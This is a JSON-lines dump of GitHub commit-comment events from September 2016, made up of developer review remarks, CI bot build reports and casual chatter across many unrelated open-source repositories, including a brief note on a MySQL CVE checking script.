{"id":"4576390676","type":"CommitCommentEvent","actor":{"login":"Yongyao"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19060438,"position":null,"line":null,"path":null,"commit_id":"07a78c31d8aaad9fba6e9a0a7c4c1243a9b8c6d8","created_at":"2016-09-16T21:11:39Z","updated_at":"2016-09-16T21:11:39Z","body":"Yes, I will do that after testing the the spark2.0 branch. BTW, how do you plan to improve the log import speed? any idea?"}},"created_at":"2016-09-16T21:11:39Z"}
{"id":"4576394166","type":"CommitCommentEvent","actor":{"login":"pajaree"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":19060448,"position":7,"line":6,"path":"package.json","commit_id":"0ed547434fe0df5b8e984122127f0bf2aef6e7f2","created_at":"2016-09-16T21:12:29Z","updated_at":"2016-09-16T21:12:29Z","body":"      .catch(handleNetworkError);"}},"created_at":"2016-09-16T21:12:29Z"}
{"id":"4576403904","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19060470,"position":null,"line":null,"path":null,"commit_id":"c6ca9c01b2e696622b61627f48a8bf9a55b3f06e","created_at":"2016-09-16T21:14:47Z","updated_at":"2016-09-16T21:14:47Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-16T21:14:47Z"}
{"id":"4576407713","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19060477,"position":null,"line":null,"path":null,"commit_id":"c6ca9c01b2e696622b61627f48a8bf9a55b3f06e","created_at":"2016-09-16T21:15:38Z","updated_at":"2016-09-16T21:15:38Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T21:15:38Z"}
{"id":"4576409928","type":"CommitCommentEvent","actor":{"login":"lewismc"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19060480,"position":null,"line":null,"path":null,"commit_id":"07a78c31d8aaad9fba6e9a0a7c4c1243a9b8c6d8","created_at":"2016-09-16T21:16:09Z","updated_at":"2016-09-16T21:16:09Z","body":"Yes we could increase batch size for starters. Right now it is [pinned at 1000](https://github.com/mudrod/mudrod/blob/spark2.0.0/core/src/main/java/esiptestbed/mudrod/driver/ESDriver.java#L128). We could potentially increase this. We should also make these values configurable e.g. add them to [MudrodConstants](https://github.com/mudrod/mudrod/blob/spark2.0.0/core/src/main/java/esiptestbed/mudrod/main/MudrodConstants.java) and drive value via [config.xml](https://github.com/mudrod/mudrod/blob/spark2.0.0/core/src/main/resources/config.xml).\r\nI profiled the code last night and we do not seem to have explicit and obvious memory leaks within the ingestion code. I therefore think that the issue must be related to how we are using the ES API."}},"created_at":"2016-09-16T21:16:09Z"}
{"id":"4576413813","type":"CommitCommentEvent","actor":{"login":"lewismc"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19060485,"position":null,"line":null,"path":null,"commit_id":"07a78c31d8aaad9fba6e9a0a7c4c1243a9b8c6d8","created_at":"2016-09-16T21:17:02Z","updated_at":"2016-09-16T21:17:02Z","body":"We could also, at some stage in the future, consider shifting our ES client to [Jest](https://github.com/searchbox-io/Jest). This offers better bulking as well as HTTTPClient authentication for security purposes. "}},"created_at":"2016-09-16T21:17:02Z"}
{"id":"4576418249","type":"CommitCommentEvent","actor":{"login":"badgew"},"repo":{"name":"jheftmann/creative-computing-fa16"},"payload":{"comment":{"id":19060496,"position":null,"line":null,"path":null,"commit_id":"144baa3c541c3867a96088462c815f8c59a5dfb5","created_at":"2016-09-16T21:18:10Z","updated_at":"2016-09-16T21:18:10Z","body":"omg u suk"}},"created_at":"2016-09-16T21:18:10Z"}
{"id":"4576418768","type":"CommitCommentEvent","actor":{"login":"badgew"},"repo":{"name":"jheftmann/creative-computing-fa16"},"payload":{"comment":{"id":19060500,"position":null,"line":null,"path":null,"commit_id":"144baa3c541c3867a96088462c815f8c59a5dfb5","created_at":"2016-09-16T21:18:16Z","updated_at":"2016-09-16T21:18:16Z","body":"jk lol "}},"created_at":"2016-09-16T21:18:16Z"}
{"id":"4576418787","type":"CommitCommentEvent","actor":{"login":"hughsie"},"repo":{"name":"endlessm/gnome-software"},"payload":{"comment":{"id":19060501,"position":3,"line":782,"path":"src/plugins/gs-plugin-appstream.c","commit_id":"fc39f4f7320887a8844329095347149aae446ad3","created_at":"2016-09-16T21:18:16Z","updated_at":"2016-09-16T21:18:16Z","body":"Out of interest, if you do app = gs_app_new (as_app_get_id (item)) here do the two lines below become not needed?"}},"created_at":"2016-09-16T21:18:16Z"}
{"id":"4576422000","type":"CommitCommentEvent","actor":{"login":"TimOPI"},"repo":{"name":"TimOPI/school-meals"},"payload":{"comment":{"id":19060511,"position":null,"line":null,"path":null,"commit_id":"17d06aee1d3614689926f569ee496b525b7a32bf","created_at":"2016-09-16T21:19:02Z","updated_at":"2016-09-16T21:19:02Z","body":"Add Applewood logo to replace USDA logo."}},"created_at":"2016-09-16T21:19:02Z"}
{"id":"4576425723","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":19060520,"position":null,"line":null,"path":null,"commit_id":"25df3ce032f2b4d5c22d738a137d5292482cd30d","created_at":"2016-09-16T21:19:55Z","updated_at":"2016-09-16T21:19:55Z","body":"#942"}},"created_at":"2016-09-16T21:19:55Z"}
{"id":"4576430136","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"BBN-Q/QuantumInfo.jl"},"payload":{"comment":{"id":19060527,"position":null,"line":null,"path":null,"commit_id":"dbcc6b0a019b96e315f408ee02574a8939c2bbf4","created_at":"2016-09-16T21:20:55Z","updated_at":"2016-09-16T21:20:55Z","body":"Correct. If you import it from base and define a new method, it's extending the Base version of `normalize` - http://docs.julialang.org/en/release-0.4/manual/modules/?highlight=import.\r\n\r\nThe best practice of avoiding \"type piracy\" is either define method names that aren't in Base on types that are in Base, or extend method names that are in Base on type signatures where at least one of the inputs is of a type defined in your package."}},"created_at":"2016-09-16T21:20:55Z"}
{"id":"4576434287","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"BBN-Q/QuantumInfo.jl"},"payload":{"comment":{"id":19060537,"position":null,"line":null,"path":null,"commit_id":"dbcc6b0a019b96e315f408ee02574a8939c2bbf4","created_at":"2016-09-16T21:21:50Z","updated_at":"2016-09-16T21:21:50Z","body":"It's an easy mistake to make, and a somewhat confusing topic. Some related discussion on a similar case here https://github.com/rened/FunctionalData.jl/issues/3"}},"created_at":"2016-09-16T21:21:50Z"}
{"id":"4576435254","type":"CommitCommentEvent","actor":{"login":"Yongyao"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19060538,"position":null,"line":null,"path":null,"commit_id":"07a78c31d8aaad9fba6e9a0a7c4c1243a9b8c6d8","created_at":"2016-09-16T21:22:04Z","updated_at":"2016-09-16T21:22:04Z","body":"yeah, I heard about Jest before. Another I forgot to mention is that, the\nlog speed on my laptop is kind of acceptable (15 mins for 1 week of logs),\nbut when we use docker, it takes about 35 mins. On my laptop, I set the ES\nheap size to 8g because of I have 16g physical memory in total. On docker,\nI tried 4g, 6g, and 8g. The time doesn't change much.\n\nThe VM we are using has 16g memory in total.\n\nOn Fri, Sep 16, 2016 at 5:17 PM, Lewis John McGibbney <\nnotifications@github.com> wrote:\n\n> We could also, at some stage in the future, consider shifting our ES\n> client to Jest <https://github.com/searchbox-io/Jest>. This offers better\n> bulking as well as HTTTPClient authentication for security purposes.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mudrod/mudrod/commit/07a78c31d8aaad9fba6e9a0a7c4c1243a9b8c6d8#commitcomment-19060485>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFS53uF9XcXqLuLKM7UcyQ1RJB7Wmswcks5qqwdOgaJpZM4J_WOo>\n> .\n>\n\n\n\n-- \nYongyao Jiang\nPh.D. Student in Earth Systems and GeoInformation Sciences\nNSF Spatiotemporal Innovation Center http://stcenter.net\nDepartment of Geography and GeoInformation Science\nGeorge Mason University\n4400 University Drive, Fairfax, VA 22030\n"}},"created_at":"2016-09-16T21:22:04Z"}
{"id":"4576437026","type":"CommitCommentEvent","actor":{"login":"LethalGhost"},"repo":{"name":"animusdev/Old-World-Blue"},"payload":{"comment":{"id":19060544,"position":null,"line":null,"path":null,"commit_id":"3df8ec05541a67bd05c035378486e70f3f7f8209","created_at":"2016-09-16T21:22:30Z","updated_at":"2016-09-16T21:22:30Z","body":"Без доступа к настройке этого придется отложить.\r\nВернем когда перекинем настройку в базу."}},"created_at":"2016-09-16T21:22:30Z"}
{"id":"4576450644","type":"CommitCommentEvent","actor":{"login":"grandbora"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19060574,"position":null,"line":null,"path":null,"commit_id":"094a098ce6ded95fa4cebe12aaf6c30c5e2884be","created_at":"2016-09-16T21:25:48Z","updated_at":"2016-09-16T21:25:48Z","body":"🚁  https://github.com/prometheus/prometheus/pull/2002 "}},"created_at":"2016-09-16T21:25:48Z"}
{"id":"4576456032","type":"CommitCommentEvent","actor":{"login":"kyle-emmerich"},"repo":{"name":"bkaradzic/bgfx"},"payload":{"comment":{"id":19060581,"position":122,"line":3430,"path":"src/renderer_gl.cpp","commit_id":"80fcf1877769332b82b6603f28d14c424bb9cb8e","created_at":"2016-09-16T21:27:04Z","updated_at":"2016-09-16T21:27:04Z","body":"m_textureSwapChain[eye] is never initialized to NULL anywhere that I can see. This is definitely causing issues because the swap chains will never get initialized."}},"created_at":"2016-09-16T21:27:04Z"}
{"id":"4576458754","type":"CommitCommentEvent","actor":{"login":"Henry12116"},"repo":{"name":"designMoreWeb/Crowdsourcing-Floodgate"},"payload":{"comment":{"id":19060590,"position":null,"line":null,"path":null,"commit_id":"cad4c43a77a252d6f77a77018c3e111d5c063d3d","created_at":"2016-09-16T21:27:44Z","updated_at":"2016-09-16T21:27:44Z","body":"# Crowd Sourcing Hoboken Flood Data - A Citizen Science Project\r\n###@jeffm24 \r\n###@kshah73 \r\n###@Henry12116 \r\n###@nishmeni \r\n###@designMoreWeb \r\nPartnered with Stevens Institute of Technology Davidson Labs\r\n\r\n## Our Climate is Changing...\r\nStorms are becoming stronger and rainfall more intense. Davidson Laboratory forecasts water level all over the New York/New Jersey area with more than 200 in water sensors and a high fidelity hydrodynamic model. Our aim with this project is to create a firm real-time system to alert people in Hoboken of areas being impacted by flooding. We hope to eventually take our work even further so that it can be applied anywhere.\r\n\r\n## Our Plan\r\nAs of now we plan on implementing the majority of this project using javascript. Check out our current dependencies here:\r\n- [AngularJS](https://angularjs.org/)\r\n- [Node.js](https://nodejs.org/en/)\r\n- [Express](http://expressjs.com/)\r\n- [d3.js](https://d3js.org/)\r\n- More to come!"}},"created_at":"2016-09-16T21:27:44Z"}
{"id":"4576460204","type":"CommitCommentEvent","actor":{"login":"schmidt-marcelo"},"repo":{"name":"ThoughtWorksInc/guia-de-desenvolvimento-tecnico"},"payload":{"comment":{"id":19060594,"position":45,"line":145,"path":"topics/Seguranca.md","commit_id":"58dc7bd429b1a6ea06e47351232b915f3ffd9a5c","created_at":"2016-09-16T21:28:06Z","updated_at":"2016-09-16T21:28:06Z","body":"ainda 'assim' ;)"}},"created_at":"2016-09-16T21:28:06Z"}
{"id":"4576469677","type":"CommitCommentEvent","actor":{"login":"AirwavesMan"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19060607,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T21:30:23Z","updated_at":"2016-09-16T21:30:23Z","body":"@ndavalos I just changed back to epoch 1.0.5.1 and the struggle swimming in the ground on tavi is not existent. Perhaps it has something in common with player_switchModel? We changed from dayz_spawnPos to respawn_west. Im not sure but it is a way better in 1.0.5.1 "}},"created_at":"2016-09-16T21:30:23Z"}
{"id":"4576471289","type":"CommitCommentEvent","actor":{"login":"marcoarthur"},"repo":{"name":"moose/Moose"},"payload":{"comment":{"id":19060611,"position":7,"line":452,"path":"lib/Moose.pm","commit_id":"49c318df621c749e9018200d08643ceefcb91387","created_at":"2016-09-16T21:30:44Z","updated_at":"2016-09-16T21:30:44Z","body":"I would suggest to put this in a bold face B<text> suggesting  Moose can them recognize the conflict in compile time."}},"created_at":"2016-09-16T21:30:44Z"}
{"id":"4576472050","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19060613,"position":null,"line":null,"path":null,"commit_id":"2a30cb97d45dbeb7a4009dcd92480b6b7b34aa5d","created_at":"2016-09-16T21:30:55Z","updated_at":"2016-09-16T21:30:55Z","body":"puppyinstaller does not support installing to a CD, i guess that code\nis there only to inform the user... i'll delete some lines.\n"}},"created_at":"2016-09-16T21:30:55Z"}
{"id":"4576472861","type":"CommitCommentEvent","actor":{"login":"mendsley"},"repo":{"name":"bkaradzic/bgfx"},"payload":{"comment":{"id":19060614,"position":122,"line":3430,"path":"src/renderer_gl.cpp","commit_id":"80fcf1877769332b82b6603f28d14c424bb9cb8e","created_at":"2016-09-16T21:31:08Z","updated_at":"2016-09-16T21:31:08Z","body":"Oh, wow. Good catch.  I missed the memcpy in the ctor like the D3D11 implementation has when merging. Will submit a change for that now."}},"created_at":"2016-09-16T21:31:08Z"}
{"id":"4576474374","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19060619,"position":null,"line":null,"path":null,"commit_id":"53ae2c8702fe6eb845071710683d6bc9c505c0e4","created_at":"2016-09-16T21:31:29Z","updated_at":"2016-09-16T21:31:29Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Tests Failed (1761 of 2331 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.55%25-red.svg)</a> \n"}},"created_at":"2016-09-16T21:31:29Z"}
{"id":"4576475256","type":"CommitCommentEvent","actor":{"login":"blackdev1l"},"repo":{"name":"Ichicoro/privacylayer"},"payload":{"comment":{"id":19060621,"position":5,"line":40,"path":".idea/misc.xml","commit_id":"00f765e7ba7d41ce3b1203c24da38711ab58565d","created_at":"2016-09-16T21:31:41Z","updated_at":"2016-09-16T21:31:41Z","body":"lol pleb"}},"created_at":"2016-09-16T21:31:41Z"}
{"id":"4576477062","type":"CommitCommentEvent","actor":{"login":"zhx828"},"repo":{"name":"zhx828/iViz"},"payload":{"comment":{"id":19060625,"position":null,"line":null,"path":null,"commit_id":"3ef5522d0785c56175790e991987d47815628d7d","created_at":"2016-09-16T21:32:09Z","updated_at":"2016-09-16T21:32:09Z","body":"Fix issue #270"}},"created_at":"2016-09-16T21:32:09Z"}
{"id":"4576481482","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.relationfield"},"payload":{"comment":{"id":19060636,"position":null,"line":null,"path":null,"commit_id":"cfce56abee81535e7a1ccd92db3b8a7511b6fcf4","created_at":"2016-09-16T21:33:12Z","updated_at":"2016-09-16T21:33:12Z","body":"@calvinhp Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.relationfield/11/violations\n```\nplone/app/relationfield/adapter.py:0:1: I001 isort found changes, run it on the file\nplone/app/relationfield/event.py:9:1: C901 'extract_relations' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-16T21:33:12Z"}
{"id":"4576486018","type":"CommitCommentEvent","actor":{"login":"soumak77"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19060646,"position":11,"line":13,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-16T21:34:16Z","updated_at":"2016-09-16T21:34:16Z","body":"@tolyo any specific reason for changing `public` to `build`?  The npm script `prebuild` will need to be updated as well."}},"created_at":"2016-09-16T21:34:16Z"}
{"id":"4576492529","type":"CommitCommentEvent","actor":{"login":"Russell91"},"repo":{"name":"Russell91/TensorBox"},"payload":{"comment":{"id":19060662,"position":null,"line":null,"path":null,"commit_id":"be6a742702b38be0a4f92815b42edc59d32f583b","created_at":"2016-09-16T21:35:53Z","updated_at":"2016-09-16T21:35:53Z","body":"> The latest version of the code doesn't work anymore with idl files or am I missing something\r\n\r\nIt should still work with idl files. Can you elaborate?"}},"created_at":"2016-09-16T21:35:53Z"}
{"id":"4576493838","type":"CommitCommentEvent","actor":{"login":"gokcehan"},"repo":{"name":"gokcehan/lf"},"payload":{"comment":{"id":19060667,"position":6,"line":357,"path":"ui.go","commit_id":"d51e99adc16c375dacea6f5c07d9bfcdfcfd4b0f","created_at":"2016-09-16T21:36:13Z","updated_at":"2016-09-16T21:36:13Z","body":"Ok I see, `defer` then `go` is the way it is then.\r\n\r\nI was testing with `sleep` call in the end as well but that example does not make any sense for real world. And, none of the solutions here work for the case when the file is smaller than the screen as there is no way to tell if the output has finished or not. We can't fix it without implementing proper asynchronous preview calls which will require mutexes for ui update and draw and likely cancellations for when the selection is changed before the previewing finishes."}},"created_at":"2016-09-16T21:36:13Z"}
{"id":"4576500385","type":"CommitCommentEvent","actor":{"login":"Felp86120502"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19060683,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-16T21:37:52Z","updated_at":"2016-09-16T21:37:52Z","body":"Antoine, peut-tu déchiffrer se message? (clique d'abord sur\"preview\")Tu me le dira à l'école.\r\n![capture d ecran 2016-09-16 a 17 30 52](https://cloud.githubusercontent.com/assets/22155855/18601931/d1e970e6-7c33-11e6-89e2-b24568374cc6.jpg)"}},"created_at":"2016-09-16T21:37:52Z"}
{"id":"4576502595","type":"CommitCommentEvent","actor":{"login":"patrik-laurell"},"repo":{"name":"patrik-laurell/edan55-labs"},"payload":{"comment":{"id":19060686,"position":null,"line":null,"path":null,"commit_id":"964f8b634f5f7cc0efe014c29dc5e325abd3c277","created_at":"2016-09-16T21:38:23Z","updated_at":"2016-09-16T21:38:23Z","body":"True that"}},"created_at":"2016-09-16T21:38:23Z"}
{"id":"4576507471","type":"CommitCommentEvent","actor":{"login":"IBPX"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19060701,"position":null,"line":null,"path":null,"commit_id":"28ccdf8c98f486ff9ce7d25f36321c3e3eae3543","created_at":"2016-09-16T21:39:34Z","updated_at":"2016-09-16T21:39:34Z","body":"Does the game really need a music player?"}},"created_at":"2016-09-16T21:39:34Z"}
{"id":"4576513527","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19060716,"position":null,"line":null,"path":null,"commit_id":"38db25d0dd79403aa73e01ac8528f2bb3aa73fc6","created_at":"2016-09-16T21:40:59Z","updated_at":"2016-09-16T21:40:59Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-51.25%25-red.svg)</a> \n"}},"created_at":"2016-09-16T21:40:59Z"}
{"id":"4576515215","type":"CommitCommentEvent","actor":{"login":"CapacitorSet"},"repo":{"name":"Ichicoro/privacylayer"},"payload":{"comment":{"id":19060720,"position":5,"line":40,"path":".idea/misc.xml","commit_id":"00f765e7ba7d41ce3b1203c24da38711ab58565d","created_at":"2016-09-16T21:41:25Z","updated_at":"2016-09-16T21:41:25Z","body":"Eh, you could always fork the project and open a PR."}},"created_at":"2016-09-16T21:41:25Z"}
{"id":"4576516770","type":"CommitCommentEvent","actor":{"login":"FelipitoSarmiento"},"repo":{"name":"wes9319/Proyecto_Estructura1"},"payload":{"comment":{"id":19060723,"position":null,"line":null,"path":null,"commit_id":"0b781d9aaf7eaf7e68d253c6c260c04e59268b19","created_at":"2016-09-16T21:41:49Z","updated_at":"2016-09-16T21:41:49Z","body":"hi! some beer? \r\n"}},"created_at":"2016-09-16T21:41:49Z"}
{"id":"4576521227","type":"CommitCommentEvent","actor":{"login":"KCherkasov"},"repo":{"name":"KCherkasov/test_tools"},"payload":{"comment":{"id":19060731,"position":null,"line":null,"path":null,"commit_id":"ae61cdcf280bb8ca57ea3222e65d6230b941d792","created_at":"2016-09-16T21:42:55Z","updated_at":"2016-09-16T21:42:55Z","body":"-slightly modified Tester::test() output."}},"created_at":"2016-09-16T21:42:55Z"}
{"id":"4576525710","type":"CommitCommentEvent","actor":{"login":"kolkov"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19060742,"position":null,"line":null,"path":null,"commit_id":"7c54b751bf25f3f07250bc9769917d58b1d30934","created_at":"2016-09-16T21:44:03Z","updated_at":"2016-09-16T21:44:03Z","body":"@christopherthielen Thanks! We look forward to the next version)"}},"created_at":"2016-09-16T21:44:03Z"}
{"id":"4576525740","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19060743,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T21:44:04Z","updated_at":"2016-09-16T21:44:04Z","body":"1051 creates the unit on `dayz_spawnPos` instead of the respawn_west marker.  `Dayz_spawnPos` is the position on the coast. The problem with that is you see units randomly appearing and disappearing on the coast when players change clothes or log in. And if the server is laggy you can shoot and kill the unit while it is there. The respawn_west marker is a safer place to do it, even though it is way off map (chernarus) or in the water on some maps (napf, tavi, namalsk, etc.).  "}},"created_at":"2016-09-16T21:44:04Z"}
{"id":"4576530346","type":"CommitCommentEvent","actor":{"login":"onmyway133"},"repo":{"name":"zenangst/Tailor"},"payload":{"comment":{"id":19060755,"position":14,"line":42,"path":"Sources/Shared/Protocols/Mappable.swift","commit_id":"a274f996894be9aab1ec5368a57634658fafe168","created_at":"2016-09-16T21:45:18Z","updated_at":"2016-09-16T21:45:18Z","body":"Good to know this `.optional`"}},"created_at":"2016-09-16T21:45:18Z"}
{"id":"4576531641","type":"CommitCommentEvent","actor":{"login":"fireshoes"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19060758,"position":43,"line":43,"path":"Mage.Sets/src/mage/sets/kaladesh/PrakhataClubSecruity.java","commit_id":"aa661e6ac30d4176827e02157444c927707986ca","created_at":"2016-09-16T21:45:37Z","updated_at":"2016-09-16T21:45:37Z","body":"This is mispelled from mtgsalvation, so is a duplicate of the correctly spelled version."}},"created_at":"2016-09-16T21:45:37Z"}
{"id":"4576536005","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19060763,"position":null,"line":null,"path":null,"commit_id":"05a371beaee54818fb341542b4e71d2a91488016","created_at":"2016-09-16T21:46:49Z","updated_at":"2016-09-16T21:46:49Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35580/testReport/) for this commit**"}},"created_at":"2016-09-16T21:46:49Z"}
{"id":"4576536338","type":"CommitCommentEvent","actor":{"login":"jlopez"},"repo":{"name":"rgeorgeoff/couchbase-jvm-core"},"payload":{"comment":{"id":19060766,"position":19,"line":19,"path":"src/main/java/com/couchbase/client/core/SequenceAwareEventHandler.java","commit_id":"3da4f6fb4af8a4dca7f46ef3fc64269af0689924","created_at":"2016-09-16T21:46:54Z","updated_at":"2016-09-16T21:46:54Z","body":"Can we make sure this method is not overridden in the subclasses? If so we need to do some adjustments."}},"created_at":"2016-09-16T21:46:54Z"}
{"id":"4576538755","type":"CommitCommentEvent","actor":{"login":"dankow"},"repo":{"name":"dankow/ansible-mysql-cve-2016-6662"},"payload":{"comment":{"id":19060770,"position":null,"line":null,"path":null,"commit_id":"02cf708ed12dff30978bdfbd607a8bc04c641953","created_at":"2016-09-16T21:47:34Z","updated_at":"2016-09-16T21:47:34Z","body":"@meersjo - Apologies for the rushed PR earlier - I didn't test it thoroughly. We want to use my_print_defaults because mysqld is trying to do things other than print --help. See https://bugs.mysql.com/bug.php?id=71599.\r\n\r\n```\r\nmysqld --help --verbose 1>/dev/null\r\n2016-09-16 21:37:53 0 [Note] mysqld (mysqld 5.6.29-76.2-log) starting as process 10308 ...\r\n2016-09-16 21:37:53 10308 [Warning] Can't create test file /var/lib/mysql/db2.lower-test\r\n2016-09-16 21:37:53 10308 [Warning] Can't create test file /var/lib/mysql/db2.lower-test\r\n2016-09-16 21:37:53 10308 [Warning] One can only use the --user switch if running as root\r\n\r\n2016-09-16 21:37:53 10308 [Warning] Buffered warning: Changed limits: max_open_files: 1024 (requested 5000)\r\n\r\n2016-09-16 21:37:53 10308 [Warning] Buffered warning: Changed limits: table_open_cache: 431 (requested 2000)\r\n\r\n2016-09-16 21:37:53 10308 [Warning] No argument was provided to --log-bin, and --log-bin-index was not used; so replication may break when this MySQL server acts as a master and has his hostname changed!! Please use '--log-bin=db2-bin' to avoid this problem.\r\nmysqld: File './db2-bin.~rec~' not found (Errcode: 13 - Permission denied)\r\n2016-09-16 21:37:53 10308 [ERROR] MYSQL_BIN_LOG::open_purge_index_file failed to open register  file.\r\n2016-09-16 21:37:53 10308 [ERROR] MYSQL_BIN_LOG::open_index_file failed to sync the index file.\r\n2016-09-16 21:37:53 10308 [ERROR] Aborting\r\n\r\n2016-09-16 21:37:53 10308 [Note] Binlog end\r\n```\r\n\r\nI wrote the first version of this script, and used mysqld because that was in @gryp's blog post. I just discovered this morning that my_print_defaults gives the same output and tries to do much less. I'd rather use a binary (my_print_defaults) that has limited functionality, rather than one (mysqld) that has the ability to do all sorts of nasty things."}},"created_at":"2016-09-16T21:47:34Z"}
{"id":"4576542114","type":"CommitCommentEvent","actor":{"login":"jlopez"},"repo":{"name":"rgeorgeoff/couchbase-jvm-core"},"payload":{"comment":{"id":19060776,"position":1,"line":418,"path":"pom.xml","commit_id":"3da4f6fb4af8a4dca7f46ef3fc64269af0689924","created_at":"2016-09-16T21:48:24Z","updated_at":"2016-09-16T21:48:24Z","body":"Don't forget to update the POM version to <NEXT_VERSION>-SNAPSHOT"}},"created_at":"2016-09-16T21:48:24Z"}
{"id":"4576542145","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/edispatcher"},"payload":{"comment":{"id":19060777,"position":5,"line":15,"path":"app/views/layouts/application.html.erb","commit_id":"f2795289241e9d53767ea051123bb159acc6d52e","created_at":"2016-09-16T21:48:24Z","updated_at":"2016-09-16T21:48:24Z","body":"Можно ещё так: `render 'footer'`, для этого нужно создать фрагмент здесь: `app/views/application/_footer.html.erb`."}},"created_at":"2016-09-16T21:48:24Z"}
{"id":"4576543143","type":"CommitCommentEvent","actor":{"login":"jlopez"},"repo":{"name":"rgeorgeoff/couchbase-jvm-core"},"payload":{"comment":{"id":19060780,"position":null,"line":null,"path":null,"commit_id":"3da4f6fb4af8a4dca7f46ef3fc64269af0689924","created_at":"2016-09-16T21:48:38Z","updated_at":"2016-09-16T21:48:38Z","body":"Done reviewing."}},"created_at":"2016-09-16T21:48:38Z"}
